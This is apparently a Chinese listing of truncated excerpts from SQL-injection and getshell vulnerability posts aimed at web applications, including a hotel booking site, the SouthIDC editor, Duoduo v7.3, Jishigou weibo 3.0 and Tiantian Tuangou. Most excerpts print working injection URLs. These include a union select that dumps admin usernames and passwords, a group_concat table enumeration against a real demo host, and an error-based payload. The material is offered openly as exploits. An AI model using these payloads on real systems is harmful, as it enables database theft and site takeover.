-
酒店宾馆网站SQL 注入漏洞
漏洞名称:酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞发现时间:2011年8月28日, 01:54:11漏洞文件:/hotel/hotel_search.asp利用条件:Null漏洞原因:文件:/hotel/hotel_search...
-
南方数据编辑器(southidceditor)注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&...
-
多多返利淘宝客程序Duoduo v7.3注入漏洞
简要描述: http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%2...
-
记事狗微博3.0 0day
你懂的。。。 wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20conc...
-
天天团购getshell最新0DAY
先暴路径:http://www.iick.blog/modules/admin/tttuangou.mod.php然后上EXP:http://www.iick.blog/index.php?mod=account&code=Send...
